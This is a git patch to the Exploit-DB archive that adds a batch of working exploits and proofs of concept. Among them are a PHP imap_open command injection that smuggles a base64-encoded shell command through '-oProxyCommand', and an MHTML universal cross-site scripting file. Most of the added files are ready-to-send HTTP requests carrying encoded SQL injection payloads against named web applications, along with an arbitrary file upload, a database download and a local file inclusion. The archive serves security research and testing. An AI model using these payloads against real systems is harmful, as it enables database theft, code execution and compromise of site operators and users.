From 268e737bb6d13a14ed946435369e97d53a822ab9 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 16 Nov 2018 05:01:40 +0000 Subject: [PATCH] DB: 2018-11-16 21 changes to exploits/shellcodes Notepad3 1.0.2.350 - Denial of Service (PoC) PHP 5.2.3 - Win32std ext. 'safe_mode' / 'disable_functions' Protections Bypass PHP 5.2.3 Win32std - 'win_shell_execute' Safe Mode / Disable Functions Bypass PHP 5.2.4 'ionCube' Extension - 'safe_mode' / disable_functions Bypass PHP 5.2.4 ionCube - 'ioncube_read_file' Safe Mode / Disable Functions Bypass PHP 5.x - COM functions 'Safe_mode()' / 'disable_function' Bypass PHP 5.x COM - Safe Mode / Disable Functions Bypass VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Configuration Host Root Privilege Escalation VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Configuration Host Local Privilege Escalation Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Privilege Escalation Libuser - 'roothelper' Privilege Escalation (Metasploit) Libuser - 'roothelper' Local Privilege Escalation (Metasploit) Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation (Metasploit) Linux 4.4.0 < 4.4.0-53 - 'AF_PACKET chocobo_root' Local Privilege Escalation (Metasploit) Sun Solaris 11.3 AVS - Local Kernel root Exploit Sun Solaris 11.3 AVS Kernel - Local Privilege Escalation PHP 5.2.3 imap (Debian Based) - 'imap_open' Disable Functions Bypass Webkit (Safari) - Universal Cross-site Scripting Webkit (Chome < 61) - 'MHTML' Universal Cross-site Scripting PHP < 5.6.2 - 'Shellshock' 'disable_functions()' Bypass Command Injection PHP < 5.6.2 - 'Shellshock' Safe Mode / Disable Functions Bypass / Command Injection PHP 5.5.9 - CGIMode FPM WriteProcMemFile Bypass Disable Function PHP 5.5.9 - 'zend_executor_globals' 'CGIMode FPM WriteProcMemFile' Disable Functions Bypass / Load Dynamic Library PHP Imagick 3.3.0 - disable_functions Bypass Imagick 3.3.0 (PHP 5.4) - Disable Functions Bypass Precurio Intranet Portal 2.0 - Cross-Site Request Forgery (Add Admin) PHP-Proxy 5.1.0 - Local File Inclusion BitZoom 1.0 - 'rollno' SQL Injection Net-Billetterie 2.9 - 'login' SQL Injection Galaxy Forces MMORPG 0.5.8 - 'type' SQL Injection EverSync 0.5 - Arbitrary File Download Meneame English Pligg 5.8 - 'search' SQL Injection Kordil EDMS 2.2.60rc3 - Arbitrary File Upload Simple E-Document 1.31 - 'username' SQL Injection 2-Plan Team 1.0.4 - Arbitrary File Upload PHP Mass Mail 1.0 - Arbitrary File Upload Wordpress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting --- exploits/hardware/dos/38475.txt | 2 +- exploits/linux/local/45865.php | 7 ++ exploits/multiple/local/45866.html | 23 ++++ exploits/multiple/local/45867.txt | 36 +++++++ exploits/multiple/remote/36839.py | 2 +- exploits/php/webapps/38127.php | 3 +- exploits/php/webapps/45860.txt | 87 +++++++++++++++ exploits/php/webapps/45861.txt | 47 ++++++++ exploits/php/webapps/45862.txt | 87 +++++++++++++++ exploits/php/webapps/45863.txt | 61 +++++++++++ exploits/php/webapps/45864.txt | 41 +++++++ exploits/php/webapps/45868.txt | 35 ++++++ exploits/php/webapps/45875.txt | 30 ++++++ exploits/php/webapps/45876.txt | 153 +++++++++++++++++++++++++++ exploits/php/webapps/45877.txt | 48 +++++++++ exploits/php/webapps/45878.txt | 84 +++++++++++++++ exploits/php/webapps/45879.txt | 69 ++++++++++++ exploits/php/webapps/45880.txt | 29 +++++ exploits/windows/local/39666.txt | 2 +- exploits/windows/local/40823.txt | 2 +- exploits/windows_x86-64/dos/45869.py | 29 +++++ files_exploits.csv | 38 +++++-- 22 files changed, 899 insertions(+), 16 deletions(-) create mode 100644 exploits/linux/local/45865.php create mode 100644 exploits/multiple/local/45866.html create mode 100644 exploits/multiple/local/45867.txt create mode 100644 exploits/php/webapps/45860.txt create mode 100644 exploits/php/webapps/45861.txt create mode 100644 exploits/php/webapps/45862.txt create mode 100644 exploits/php/webapps/45863.txt create mode 100644 exploits/php/webapps/45864.txt create mode 100644 exploits/php/webapps/45868.txt create mode 100644 exploits/php/webapps/45875.txt create mode 100644 exploits/php/webapps/45876.txt create mode 100644 exploits/php/webapps/45877.txt create mode 100644 exploits/php/webapps/45878.txt create mode 100644 exploits/php/webapps/45879.txt create mode 100644 exploits/php/webapps/45880.txt create mode 100755 exploits/windows_x86-64/dos/45869.py diff --git a/exploits/hardware/dos/38475.txt b/exploits/hardware/dos/38475.txt index a999d705e..a0116e8e5 100644 --- a/exploits/hardware/dos/38475.txt +++ b/exploits/hardware/dos/38475.txt @@ -13,7 +13,7 @@ Reported: Public release: Author: Lyon Yang -Paper: https://www.exploit-db.com/docs/39658.pdf +Paper: https://www.exploit-db.com/docs/english/39658-exploiting-buffer-overflows-on-mips-architecture.pdf Summary: -------- diff --git a/exploits/linux/local/45865.php b/exploits/linux/local/45865.php new file mode 100644 index 000000000..467668b5b --- /dev/null +++ b/exploits/linux/local/45865.php @@ -0,0 +1,7 @@ +/tmp/test0001 + +$server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}"; + +imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error()); \ No newline at end of file diff --git a/exploits/multiple/local/45866.html b/exploits/multiple/local/45866.html new file mode 100644 index 000000000..ada77a11a --- /dev/null +++ b/exploits/multiple/local/45866.html @@ -0,0 +1,23 @@ + + + +hello + \ No newline at end of file diff --git a/exploits/multiple/local/45867.txt b/exploits/multiple/local/45867.txt new file mode 100644 index 000000000..b41758839 --- /dev/null +++ b/exploits/multiple/local/45867.txt @@ -0,0 +1,36 @@ + + + + + +MIME-Version: 1.0 +Content-Type: multipart/related; + type="text/html"; + boundary="----MultipartBoundary--" +CVE-2017-5124 + +------MultipartBoundary-- +Content-Type: application/xml; + + + + +]> + + + + + + +------MultipartBoundary-- +Content-Type: text/html +Content-Location: https://google.com + + +------MultipartBoundary---- \ No newline at end of file diff --git a/exploits/multiple/remote/36839.py b/exploits/multiple/remote/36839.py index 9c6087db6..f81f5344e 100755 --- a/exploits/multiple/remote/36839.py +++ b/exploits/multiple/remote/36839.py @@ -9,7 +9,7 @@ # Tested on: AirTies RT-204v3 # CVE : 2013-0230 # Exploit gives a reverse shell to lhost:lport -# Details: https://www.exploit-db.com/docs/36806.pdf +# Details: https://www.exploit-db.com/docs/english/36806-developing-mips-exploits-to-hack-routers.pdf import urllib2 from string import join diff --git a/exploits/php/webapps/38127.php b/exploits/php/webapps/38127.php index 54eb97a4b..b07682923 100644 --- a/exploits/php/webapps/38127.php +++ b/exploits/php/webapps/38127.php @@ -1,5 +1,6 @@ + +
+ + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/45861.txt b/exploits/php/webapps/45861.txt new file mode 100644 index 000000000..c5d221526 --- /dev/null +++ b/exploits/php/webapps/45861.txt @@ -0,0 +1,47 @@ +# Exploit Title: PHP-Proxy 5.1.0 - Local File Inclusion +# Date: 2018-11-13 +# Exploit Author: Ameer Pornillos +# Contact: https://ethicalhackers.club +# Vendor Homepage: https://www.php-proxy.com/ +# Software Link: https://www.php-proxy.com/download/php-proxy.zip +# Version: 5.1.0 +# Category: Webapps +# Tested on: XAMPP on Win10_x64 +# Description: Downloadable pre-installed version of PHP-Proxy 5.1.0 +# make use of a default app_key wherein can be used for local file inclusion +# attacks. This can be used to generate encrypted string which +# can gain access to arbitrary local files in the server. +# http://php-proxy-site/index.php?q=[encrypted_string_value] +# CVE: CVE-2018-19246 + +# POC: +# 1) +# Generate encrypted string value using the PHP script below +# 2) +# Browse to URL +# http://php-proxy-site/index.php?q=[encrypted_string_value] +# to read local file + + \ No newline at end of file diff --git a/exploits/php/webapps/45862.txt b/exploits/php/webapps/45862.txt new file mode 100644 index 000000000..cfb9b8af4 --- /dev/null +++ b/exploits/php/webapps/45862.txt @@ -0,0 +1,87 @@ +# Exploit Title: BitZoom 1.0 - 'rollno' SQL Injection +# Dork: N/A +# Date: 2018-11-14 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://bitzoom.sourceforge.io/ +# Software Link: https://excellmedia.dl.sourceforge.net/project/bitzoom/bitzoom-master.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/forgot.php +# +POST /PATH/forgot.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=rsq0813q4hl4dtbfesogugiln3 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 572 +rollno=%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2d%2d%20%2d +HTTP/1.1 200 OK +Date: Wed, 14 Nov 2018 11:17:49 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 2488 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/forgot.php +# +POST /PATH/forgot.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=rsq0813q4hl4dtbfesogugiln3 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 574 +username=%31%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2d%2d%20%2d +HTTP/1.1 200 OK +Date: Wed, 14 Nov 2018 11:17:52 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 2486 +Keep-Alive: timeout=5, max=99 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 3) +# http://localhost/[PATH]/login.php +# +POST /PATH/login.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 592 +username=%31%32%27%7c%28%53%65%6c%65%43%54%20%27%45%66%65%27%20%46%72%6f%4d%20%64%75%41%4c%20%57%68%65%52%45%20%31%31%30%3d%31%31%30%20%41%6e%44%20%28%73%65%4c%45%63%54%20%31%31%32%20%66%72%4f%4d%28%53%45%6c%65%63%54%20%43%6f%75%4e%54%28%2a%29%2c%43%6f%6e%43%41%54%28%44%41%54%41%42%41%53%45%28%29%2c%28%53%65%4c%45%63%74%20%28%45%4c%54%28%31%31%32%3d%31%31%32%2c%31%29%29%29%2c%46%4c%6f%6f%52%28%52%41%6e%64%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%72%6d%61%74%49%4f%4e%5f%53%63%68%45%4d%41%2e%50%6c%75%47%49%4e%53%20%67%72%4f%55%70%20%42%59%20%78%29%61%29%29%7c%27&password=Efe +HTTP/1.1 200 OK +Date: Wed, 14 Nov 2018 11:03:08 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 585 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45863.txt b/exploits/php/webapps/45863.txt new file mode 100644 index 000000000..182f6f327 --- /dev/null +++ b/exploits/php/webapps/45863.txt @@ -0,0 +1,61 @@ +# Exploit Title: Net-Billetterie 2.9 - 'login' SQL Injection +# Dork: N/A +# Date: 2018-11-13 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://net-billetterie.tuxfamily.org/ +# Software Link: https://netix.dl.sourceforge.net/project/netbilletterie/Netbilletterie2.9.zip +# Version: 2.9 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/login.inc.php +# + +# //login.inc.php +# .... +#18 if (isset ($_POST) && !empty($_POST['login']) && !empty($_POST['pass'])) +#19 { +#20 extract($_POST); +#21 $pass=md5($pass); +#22 +#23 $sql="SELECT * FROM ".$tblpref."user WHERE login='$login' AND pwd='$pass' "; +#24 $req=mysql_query($sql) or die (mysql_error()); +#25 if( mysql_num_rows($req)>0) +#26 { +#27 $data = mysql_fetch_array($req); +#28 $login = $data['login']; +#29 $num=$data['num']; +#30 +#31 $_SESSION['Auth']=array( +#32 'login' =>$login, +#33 'pass' =>$pass, +#34 'lang' =>'fr', +#35 'tblpref'=>$tblpref, +#36 'num' =>$num +# .... + +POST /[PATH]/login.inc.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=ahn0q4qtr7adcj7kol54879rv0 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 579 +login=%31%27%20%4f%52%20%28%53%45%4c%45%43%54%20%31%31%32%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%31%32%3d%31%31%32%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%2d%2d%20Efe&pass=Efe +HTTP/1.1 200 OK +Date: Tue, 13 Nov 2018 10:57:05 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 84 +Keep-Alive: timeout=5, max=97 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45864.txt b/exploits/php/webapps/45864.txt new file mode 100644 index 000000000..bb61a86d2 --- /dev/null +++ b/exploits/php/webapps/45864.txt @@ -0,0 +1,41 @@ +# Exploit Title: Galaxy Forces MMORPG 0.5.8 - 'type' SQL Injection +# Dork: N/A +# Date: 2018-11-14 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://galaxy.alyx.pl/ +# Software Link: https://excellmedia.dl.sourceforge.net/project/galaxyforces/galaxy/0.5.8/galaxy-0.5.8.7z +# Version: 0.5.8 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# Users.. +# http://localhost/[PATH]/ads.php +# +# action=add&title=[Do not leave empty..]&type=[SQL]&time=[Do not leave empty..]&message=[Do not leave empty..] +# +POST /PATH/ads.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: RID=d3fada0e6d425fdf; login=efe; salt=b5c59c9626445d978940049594f60c858642d268; agree=true +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 368 +action=add&title=[Efe]&type=%27%7c%7c(SeleCT%20'%45%66%65'%20FroM%20duAL%20WheRE%20110%3d110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*)%2cConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT%28%31%31%32%3d%31%31%32%2c%31%29%29%29%2cFLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))%7c%7c%27&time=[Efe]&message=[Efe] +HTTP/1.1 302 Found +Date: Wed, 14 Nov 2018 15:12:30 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Set-Cookie: RID=44ff5c8a0c395f9b; expires=Wed, 14-Nov-2018 16:12:30 GMT; Max-Age=3600 +Set-Cookie: login=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0 +Set-Cookie: salt=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0 +Content-Length: 0 +Keep-Alive: timeout=5, max=99 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 +#Etc.. \ No newline at end of file diff --git a/exploits/php/webapps/45868.txt b/exploits/php/webapps/45868.txt new file mode 100644 index 000000000..fa1cc416b --- /dev/null +++ b/exploits/php/webapps/45868.txt @@ -0,0 +1,35 @@ +# Exploit Title: EverSync 0.5 - Arbitrary File Download +# Dork: N/A +# Date: 2018-11-14 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://phpmassmail.sourceforge.io/ +# Software Link: https://datapacket.dl.sourceforge.net/project/eversync/Downloads/alpha/EverSync-Pre-alpha05.zip +# Version: 0.5 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: Dztabase Download +# 1) +# http://localhost/[PATH]/files/db.sq3 +# + +GET /[PATH]/files/db.sq3 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=dhq0fbvco8d0sc0lem3l2kktk0 +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +HTTP/1.1 200 OK +Date: Wed, 14 Nov 2018 19:47:32 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +Last-Modified: Wed, 14 Nov 2018 19:37:00 GMT +ETag: "3800-57aa50ed0a29c" +Accept-Ranges: bytes +Content-Length: 14336 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive \ No newline at end of file diff --git a/exploits/php/webapps/45875.txt b/exploits/php/webapps/45875.txt new file mode 100644 index 000000000..1d9495453 --- /dev/null +++ b/exploits/php/webapps/45875.txt @@ -0,0 +1,30 @@ +# Exploit Title: Meneame English Pligg 5.8 - 'search' SQL Injection +# Dork: N/A +# Date: 2018-11-13 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://sourceforge.net/projects/meneame-english/ +# Software Link: https://master.dl.sourceforge.net/project/meneame/meneame/Beta%205.8/Pligg_Beta_5.8.rar +# Version: 5.8 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/index.php?search=[SQL] +# +GET /[PATH]/?search=%61%27%29%20%41%4e%44%20(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))%20--%20Efe HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Tue, 13 Nov 2018 15:10:50 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 7044 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45876.txt b/exploits/php/webapps/45876.txt new file mode 100644 index 000000000..ed3c1575f --- /dev/null +++ b/exploits/php/webapps/45876.txt @@ -0,0 +1,153 @@ +# Exploit Title: Kordil EDMS 2.2.60rc3 - Arbitrary File Upload +# Dork: N/A +# Date: 2018-11-13 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.kordil.net/ +# Software Link: https://vorboss.dl.sourceforge.net/project/kordiledms/Kordil%20EDMS%20v2.2.60rc3/kordil_edms_installer.exe +# Version: 2.2.60rc3 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# Users... +# 1) +# http://localhost/[PATH]/routine_emails_to_all_users_add.php +# +POST /[PATH]/routine_emails_to_all_users_add.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=187947eb3de6ad8f5541f2c8d8e94225 +Connection: keep-alive +Content-Type: multipart/form-data; boundary= +---------------------------114917121519378418451544589507 +Content-Length: 973 +-----------------------------114917121519378418451544589507 +Content-Disposition: form-data; name="add_fd1" +admin +-----------------------------114917121519378418451544589507 +Content-Disposition: form-data; name="add_fd2" +Efe +-----------------------------114917121519378418451544589507 +Content-Disposition: form-data; name="add_fd3" +2018-11-13 15:04:48 +-----------------------------114917121519378418451544589507 +Content-Disposition: form-data; name="upload_fd4"; filename="phpinfo.php" +Content-Type: application/force-download + +-----------------------------114917121519378418451544589507 +Content-Disposition: form-data; name="add_fd5" +-----------------------------114917121519378418451544589507 +Content-Disposition: form-data; name="act" +n +-----------------------------114917121519378418451544589507 +Content-Disposition: form-data; name="QS_Submit" +Add +-----------------------------114917121519378418451544589507-- +HTTP/1.1 302 Found +Date: Tue, 13 Nov 2018 12:15:22 GMT +Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9 +X-Powered-By: PHP/5.2.9 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Location: ./routine_emails_to_all_users.php? +Content-Length: 0 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html + +GET /PATH/email_attachment/admin-13.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/[PATH]/routine_emails_to_all_users.php? +Cookie: PHPSESSID=187947eb3de6ad8f5541f2c8d8e94225 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Tue, 13 Nov 2018 12:15:30 GMT +Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9 +X-Powered-By: PHP/5.2.9 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html + +# POC: +# 2) +# http://localhost/[PATH]/routine_emails_to_all_users_add.php +# +# http://localhost/[PATH]/email_attachment//[FILE] +# + + +
+ + + + + + + +
+ + + +# POC: +# 3) +# http://localhost/[PATH]/users_edit.php?currentrow_fd0=[SQL] +# +GET /PATH/users_edit.php?currentrow_fd0=%2d%31%20%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%2c%32%39%2c%33%30%2c%33%31%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=d015a96da04d6dae8233a68bb35fb5d9 +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +HTTP/1.1 200 OK +Date: Tue, 13 Nov 2018 12:21:09 GMT +Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9 +X-Powered-By: PHP/5.2.9 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html + +# POC: +# 4) +# http://localhost/[PATH]/users_edit.php?currentrow_fd0=[SQL] +# +GET /PATH/personal_notebook_category_edit.php?currentrow_fd0=%2d%31%30%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=d015a96da04d6dae8233a68bb35fb5d9 +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +HTTP/1.1 200 OK +Date: Tue, 13 Nov 2018 12:22:49 GMT +Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9 +X-Powered-By: PHP/5.2.9 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, 